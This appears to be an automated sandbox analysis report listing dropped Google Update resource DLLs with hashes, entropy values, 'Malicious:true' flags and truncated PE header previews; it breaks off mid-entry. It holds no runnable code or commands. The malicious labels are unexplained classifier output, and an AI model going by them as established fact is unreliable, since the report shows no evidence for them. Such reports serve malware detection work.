                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ .......................................e....@.............................I....0..(....@...s.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....s...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.577077407328838
                                      Encrypted:false
                                      SSDEEP:384:3DIArIn+sdB3LzIYi6yuAuAM+o/8E9VF0Ny1G:UwIn+m3L8Yi6yYAMxkEC
                                      MD5:49A37B39ED5F6FC7F8ED271AFB7B4B00
                                      SHA1:E688384442CF0C87D95AFE2DD4AC9219E2AC6862
                                      SHA-256:D6A2194ED9FC11CF4EE229D6282225E732594C345B3A948D78E1E25287E2BB92
                                      SHA-512:D75608306A0B44A1A6C8264804FC77DDA034A83A2E1198A982A388B99E595687AA2B1C34D49F4EBC92B05F4932319EB0F66CAA5D749E1A8F0B33B51A379367AA
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..@z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):41760
                                      Entropy (8bit):4.801857148906621
                                      Encrypted:false
                                      SSDEEP:384:AUmv7kdVe4DyCc53iKRlIYi6y7ieM1AM+o/8E9VF0NyIDz:56SqRSYi6ybyAMxkEc
                                      MD5:7C89D57D66E73D8F09EBAFA1733E61C2
                                      SHA1:D2CDF93717DA261437A841DC7BEA321DDA20736A
                                      SHA-256:936CA4058D17CEFF0AD72FFD721EC87E76A7DF8066FB10110A8AE7BF311D5C27
                                      SHA-512:205EAE74837C601E459BA5D7A994F3BA76B279CA67FFC8D694D9B75BAF72BEDAF72F18443417010C19FD3C97560AA7C1284B319A738AFEA5A2402D7763FB1674
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........t......h........ .......................................5....@.............................I....0..(....@..(k...........z.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...(k...@...l..................@..@.reloc.. ............x..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):40736
                                      Entropy (8bit):4.828241660597864
                                      Encrypted:false
                                      SSDEEP:384:lG4hEXjOBWcieIYi6yj4/AM+o/8E9VF0Nym:nhETOBWcizYi6ykAMxkE
                                      MD5:56C037987597E28377C43DF3FD64A2A0
                                      SHA1:1E769EF90A0C8C5BF3C4A6D4E4FF5897A4E1AB84
                                      SHA-256:D158B0A602FAFDA9A117AD6065ECAB3F02159EC1055ADBAC8979B311DB83E1C7
                                      SHA-512:B2982807011CC473842AA89AA425FCC504D91072E384246122EBDC33B56ECAFE16B746CF5206D2686412F90EE663B1545565CC050DDA600295AA8BB4FA0F6828
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........p......h........ ......................................2.....@.............................I....0..(....@...f...........v.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....f...@...h..................@..@.reloc.. ............t..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.911151318124229
                                      Encrypted:false
                                      SSDEEP:384:K8ZcsfWBBS4XIYi6yNc9AM+o/8E9VF0Ny+oV:Msf2k4YYi6yNcAMxkEZ
                                      MD5:78BA7D33500CFA4639519609F7CEDEC8
                                      SHA1:9B0D9C945917D61F8A0CAF2C3E11D0CB2C7E6C7F
                                      SHA-256:6C8C7692FCCE08684EAD91E0A68C09121E46E45C1AA5D30AA9342D9FF099A3E8
                                      SHA-512:F3E7ACBAAEE401A2A3B0A68DB88FBF6FB620940CFE2891D822F38EF18EE5739D0CE66D5F440EB8CCC1D336AC5A406BB668CA20EBA9FB494C0ADFF3BDE8C73D96
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..@{.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@{...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):39712
                                      Entropy (8bit):4.878653000724356
                                      Encrypted:false
                                      SSDEEP:384:kp4Szd3IY+N1vZ0YoRHgA12slxB4xR0kTY1M5tkOobIYi6yIjLAM+o/8E9VF0Ny6:44SVmAaPjvokYi6y8LAMxkEI
                                      MD5:5C8D844A20331D1753B38BABC1EC567E
                                      SHA1:EBF130FB8C1550D329AA2EB008780C2A8A69DC06
                                      SHA-256:2DA70429E0E6B931DA700861A2C0B416D9420C3973531EDEF460079FD2D95C8D
                                      SHA-512:0A27588C7F5791940AC4D8946533A1572D70F8C4FBDF0CE35A3C15A3AE56D77D2094B2B2C1ED4090BFAD4CE11488D616D5BEDFE6DC62BA32AB33714ABCE8EC65
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........l......h........ .......................................r....@.............................I....0..(....@...c...........r.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....c...@...d..................@..@.reloc.. ............p..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.623100744736137
                                      Encrypted:false
                                      SSDEEP:384:AGD3nc9eHz03T0R8C923FNIYi6ysTCyAM+o/8E9VF0NyD66J:TLckHz03T0R8C98aYi6yxyAMxkEs
                                      MD5:979DDD15D4625F2D9442308AC23B093E
                                      SHA1:41BDAF8E7930A788E72B2E8D812D3AD8CC9614D9
                                      SHA-256:546EC90E214472E91048428924AEA9853EB1A0BAEA8FCA9AF87F5B4640440078
                                      SHA-512:148E0C38279D1AE560713FA4C0F2BF1C0245B6971D71D7B4A2CF44C4D512AD1FC8A9CB33CE7554F4A4855CC0EF319C6E72784CB2C4B87B324990BA945C31EF9F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ......................................d.....@.............................I....0..(....@...r.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....r...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.65084058038331
                                      Encrypted:false
                                      SSDEEP:384:neF5yQOea2eubIYi6yOtwAM+o/8E9VF0NyT5mN:eVCukYi6yBAMxkE3m
                                      MD5:DD5164441187CD34CF6B4571AD06B02F
                                      SHA1:12ACF5A1184C074EF04B52F2E855866B815FE61F
                                      SHA-256:DF49A28D88B5A20F2BD26FE17FD049A04BAA5C27C0C9D96203335C4EE52D4413
                                      SHA-512:C1BB517C682F211F6894C06810BF13079DABBC1912D8F6932746C0DC774B1AD836C21CB2E7F19F7575EB4BA989644F7806F13FCA2653DAB7B44960A567788A57
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................c....@.............................I....0..(....@...w.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....w...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):47392
                                      Entropy (8bit):4.877833078833774
                                      Encrypted:false
                                      SSDEEP:384:bpuBJvfZigR8/JLpLIYi6yRblAM+o/8E9VF0Nyv:VkoJLp0Yi6yzAMxkE
                                      MD5:1A68C9A98363C381F08922F560250758
                                      SHA1:5C8FAB19A6FCE550C541DDAE84C1ED1EEB1D9A8F
                                      SHA-256:2A308897298977866C0199C137F679773ED63ED703B1286D07CF0E1DE45225F1
                                      SHA-512:C22490C4660BA897C34EAF2F1681B9EF713BB8DA72969DB4A462EC8F639EEF1A3403A7CBAFE8F86906D69A4C716E8D638CAF89AA9911996D1D1600B0659BCE07
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................;....@.............................I....0..(....@..H............... )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...H....@......................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.8496864323256945
                                      Encrypted:false
                                      SSDEEP:384:0sLcdCT73y7OiAEgUIYi6yj4yAM+o/8E9VF0NyVb:DLuCT73y7DTglYi6ybAMxkE7
                                      MD5:B7479D97664FF3F68883A4665AD46F03
                                      SHA1:FED7419A8408ADECD531D6F7E1A24BFBBB97A25B
                                      SHA-256:D8B54B04A01467927702A439F875DE02577721DA3D6B393FC9B6D5F81F0E363B
                                      SHA-512:3885C46F4763961AC41ECF4E33EF67F560B14672087894BC0D72B6FDF1E73FEECC5A4990F0DF52759032085AE4B9CF918355010954166614B18E3CFED2E82645
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..(y.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...(y...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.589952680264056
                                      Encrypted:false
                                      SSDEEP:384:mmlvqFCrRLtUv6odpayK/YjfZ/fbMwTRlREFTIYi6yacH58GAM+o/8E9VF0NyW:xkhf3TF8cYi6yj58GAMxkE
                                      MD5:7F3113DEF8E50C086BBE84273477BAD4
                                      SHA1:F29165A7988ED9B46FA162B02CBC58E3BAF9DC8D
                                      SHA-256:60821A3672D3170F4D2E230E4C72AA3FEF58CDEEA16D0AF22B5C2077BD76750A
                                      SHA-512:3FB6F5EA722E81CCFBAF01110FA341F8299A81B71AE072F52D11E2C8B3BCF202175F9C8E176C289AEAC9D405D9919E406AE75929A942B52F49CC52A0858611DD
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ......................................+.....@.............................I....0..(....@..0s.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0s...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.581801220672784
                                      Encrypted:false
                                      SSDEEP:384:MSnTcrh3Ne1sIYi6yTosAM+o/8E9VF0NyxyCA:rng/e19Yi6yksAMxkEaCA
                                      MD5:092DF8FBD33220A72D1A81745CD61722
                                      SHA1:16EE50224DC792A144DD8445C1B1017F0B22D252
                                      SHA-256:001666EAD47D5EFA71CCFA9818269E137F0C4AD90F32D758A9E6D9BC4560BB9D
                                      SHA-512:D2DA63CFB76879745DE3D2B537673F584BD2F28FCA9582A8476F78B69AE0CAA156085B61C33F03737748B942A1196EC0F1A4628766AD85AD6DE60C6D68CB5EA2
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..(x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...(x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.60783079649953
                                      Encrypted:false
                                      SSDEEP:384:Yi5JZSiyCSiy4DVqeAYiTv4yywQP+IYi6ynuAM+o/8E9VF0Nymm:vDVmYGAyBQPTYi6yuAMxkE9
                                      MD5:9EFB18E27E49361B5CA0FE4EEBB286B2
                                      SHA1:7E522BEABDE6AD87AEC419F4C26395C64D8382A8
                                      SHA-256:3C066FF77D407AD1547372027F0C569FF65B06F1A5E34ED578AB9E6B87CE4876
                                      SHA-512:5C034C37801CEA6FA3219D24F81B62BD416E4CE2E9102285BE34ADE76D80ED0229D7951C8B4626E2AA602991A8BA5424C2409A50F9DC8909D335A84D6BCCC52B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ............................................@.............................I....0..(....@..hu.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...hu...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.647423060191508
                                      Encrypted:false
                                      SSDEEP:384:X6hn7KZHWCE1UuGp6ZMIYi6ybue8LAM+o/8E9VF0Nyxw3:qxyLEGUZdYi6yaVLAMxkEc
                                      MD5:355FE9CE9DB81686DB356A30C17212A4
                                      SHA1:6EB7892A5AB482F9F2E4C91DC12700E1E0EEFFAC
                                      SHA-256:5A6D70DA9A5EBAE1D28D8FA97EC40E40B271D5386648A5D00E28D49FD41A2BB0
                                      SHA-512:B76653623BBEF763639AB79F75173811962727B677BFD359952224D61A4537F8EC8067CE9281145F1500D68B4133792C1A03BEAE9708067D3A57BF2138E63D9B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................z....@.............................I....0..(....@.. w.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc... w...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.611879668618853
                                      Encrypted:false
                                      SSDEEP:384:Bafhcxr/vX88kIYi6yazaAM+o/8E9VF0Nykk:I5ms8VYi6yLAMxkEZ
                                      MD5:9DD85190C1CA43E4EA964F6695F34865
                                      SHA1:F0C597A48312D55A6B820EEEA05747B99D815A96
                                      SHA-256:EE5403A3EA60D3308D4999E6092AA4AD80FEC2A90A701E7EDE44F29298C48737
                                      SHA-512:3BA6B4143DFD3BE9F9F5CF4D80E54F99BC68976F7BB662F97BCCC80BC1789494A35FA958921589D65131D5CB1784FD09C48F7BBE940CED165EF4B0DC9AFB998B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................\....@.............................L....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.613512051839508
                                      Encrypted:false
                                      SSDEEP:384:wOytst7KKEx+1GGBmVIYi6yNNkAM+o/8E9VF0NyQ0pYC:wCwxMGWmiYi6yAAMxkEHpr
                                      MD5:82EF6EC70333A490ACFA9E46680A5D50
                                      SHA1:7DEE942E0AF205B0D5E65A237FCB571602080D61
                                      SHA-256:21193D4BEEAD2B2D43AD2417219018803103B5E0DB94273005C0F480C3EF5D73
                                      SHA-512:C819BA1F42FBF11E446DCD2E4A51E9F2D607A941D0380768747286D0F8DCC7872FD76669F411A4A61E9E0417AAE4E2D6085611ABAE62777FEAC6E9A4E1CD6061
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ...........................................@.............................L....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.619054468277444
                                      Encrypted:false
                                      SSDEEP:768:wzSCRNND67qGGQdVqbrI1naEpXuYi6y0AMxkEM:wzudVqPMaD76xY
                                      MD5:DD97A63DF7DDFC0ED38F09DCFB8F31F8
                                      SHA1:ED049D9162F9216EE6B440EDE178AF8AE489501C
                                      SHA-256:69333435AFBC6821A0F40497466F98FA8E20A10EE928B2A85EC711AC77D7442C
                                      SHA-512:F2B99A9FDE86C21BF99423D1686A0D9A7D4A064AE9B648346DB65EC071E86E6070B0BD72D24A2806A316108ED7CB9B1BDFE8713E1C8F661BD66EF5F540E1207C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................Z.....@.............................I....0..(....@...w.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....w...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.8159167593565515
                                      Encrypted:false
                                      SSDEEP:384:npoFA4ZUvHlzo4d2sToIYi6y2MtEAAM+o/8E9VF0Nyo:p3vHus1Yi6yvaAAMxkE
                                      MD5:6534FDFC9541218C0CC45450FF5CF322
                                      SHA1:E34F0094597907895DB8E5460A2177231C4E3C82
                                      SHA-256:08FB286A2823FEF7A25B8359BEEF81F6F1BA65DE7A9E76CA598612A981E3BC8E
                                      SHA-512:4C86EFBAB153EF7FD06F5283737F1859CF6F10DC3F64D36684AB0CD81D3EB5B2A7AC2FBE6C1EF2F21C3ECEB67694560894E162E57DFA1E177A64D67CD8537E52
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ .......................................k....@.............................I....0..(....@...r.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....r...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.639739844002661
                                      Encrypted:false
                                      SSDEEP:384:mVJeUqha1iR6wLT6vIYi6ykB3pAM+o/8E9VF0NykNd:gJRgxRD6QYi6ycZAMxkEO
                                      MD5:59E7C6D09737F36D43DC66CF6550109B
                                      SHA1:4BDC91BA8FC182ED213345E49B2806918CC03712
                                      SHA-256:99C406740386846DE02FD0B8AF6D63B1B6DE586F0D3125846B904C8B2F35FFEF
                                      SHA-512:BBAC8E066927EFB40545E2D474DAD921DCA646407E2BB2360F6F7802E0CBFB71C4B60AE8ECA6C13B49CBE469141A301194CC43CB12464E1E826C56BA0A04E4CD
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ............................................@.............................I....0..(....@...t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.598618299189994
                                      Encrypted:false
                                      SSDEEP:384:oOkTvshVyiWQZpdpWBdd1imIXous8cIYi6yDygAM+o/8E9VF0NyaK:LsrQZpO14Zs8NYi6ybAMxkE
                                      MD5:10C0234687254950BB93F7C379C1DA49
                                      SHA1:45B21D2531CA4F8ED67767C3E813B3A5F51845D3
                                      SHA-256:0EAF7F8721F2B51D10FF36C1EF0BC7CD958B351A81A720E0B8908F93048FB88D
                                      SHA-512:1A6EA2CDC3B55618F8145BA957089F01C613E407797256FA540A7AC9723A216419463A07A0A99FDC62D827DCCC5F6290F84E79B21E810DED9F990331E422D70D
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................`....@.............................I....0..(....@...v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.8146037455010395
                                      Encrypted:false
                                      SSDEEP:384:Z71rxgxLUjYFotGNxIYi6yNgzAM+o/8E9VF0NykR1Gz:h1IUjO4GNmYi6yazAMxkEuU
                                      MD5:66813FB0D3A66FC673133C288AA21F29
                                      SHA1:C934F77F2B4E8F8BE1D9A63497A7549E5F9E4A7B
                                      SHA-256:6A5459C40D0E8F8D7DCB3AA457D70BF3655F8B9F52121AB16ADFEBE56A8AAF73
                                      SHA-512:EE7F26F6734F8743AAFD7A41B647DD92330618F9014E88BDCB8FB3E1B90F7B6D6A3CF4DF22171D7ADD5DF0AF8196E8AD68C85BCB71A4D75F1E31061A52055FEA
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................4.....@.............................I....0..(....@..8u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...8u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.614670449990197
                                      Encrypted:false
                                      SSDEEP:384:nbrkxa77CEhE7wIYi6y/ZAM+o/8E9VF0Ny84:n/kxaCEhE7ZYi6yBAMxkE9
                                      MD5:54C3BD48650DDA24560A3F567929A876
                                      SHA1:53C6A27155EE329774D97B533210211A9946D607
                                      SHA-256:AB5CB8DA8269308EAF2A2C0CABACFD02F21787C08AC99C5380BD74A6307CE6A7
